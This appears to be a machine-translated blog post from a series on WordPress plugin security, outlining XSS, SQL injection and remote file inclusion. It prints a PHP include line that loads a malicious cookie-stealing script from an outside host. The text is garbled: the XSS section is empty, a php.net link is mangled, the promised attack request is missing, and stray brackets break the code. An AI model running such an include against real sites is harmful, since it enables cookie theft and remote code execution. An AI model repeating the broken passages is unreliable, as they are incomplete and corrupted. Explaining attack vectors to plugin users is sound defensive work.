This week I started the series of WordPress plugins security . We have established that the golden rule in web security is to check the "gateways". And this is to monitor the areas of a website that an attacker could use to send data to your website. I would like to delve deeper into this today.
WordPress support expert, Podz, asks in his blog, " What is dangerous? "
The answer is in understand the vectors of attack . Attack vectors, such as Crossed Scripts, SQL Injections and Remote File Inclusion, are some of the most used methods to attack a web. If you understand the principles on which they are based you will have a greater understanding of what you need to look for in a plugin. So let's go to it do not you think?
Crossed Scripts (XSS)
Remote File Inclusion
A third attack vector that should be avoided is the inclusion of remote file. This is to use a PHP function (
<a href = "http://us2.php.net/incm VFR# 6 ^ude()) to insert a piece of code hosted on Any site and executed on the remote server In other words, an attacker can write a small script that registers IP addresses, cookies, etc. and if you can include a PHP script on your site, you can provide valuable information to the attacker The IFR is usually found when a user input (form, address bar) is directly included in a
include () .
For example, a link of this type:
http://example.com/?page=about could have some code that provides the right content
This kind of sloppy code is more common than you imagine. of the developer could be, in this example, include the contents of about.php on the main page. what would happen if I send this request to my browser:
Then, your page would be actually executing this order :
< ? php include ( "http://mydomain.com/script_lectura_cookie_maliciosa.php" ) ; ]?>
A very dangerous issue.
How does this affect WordPress?
In the following articles of this series we will take a look at the security implications specific to WordPress plugins ] Any plugin that is used should be inspected initially to see if it allows interaction with the user. If you allow user interaction you might be prone to one of these vector attacks .
Do not assume, however, that a plugin that accepts interaction is dangerous. It is a question of the code and the developer to offer an appropriate and secure user input .
Read other articles in the series about WordPress plugins security :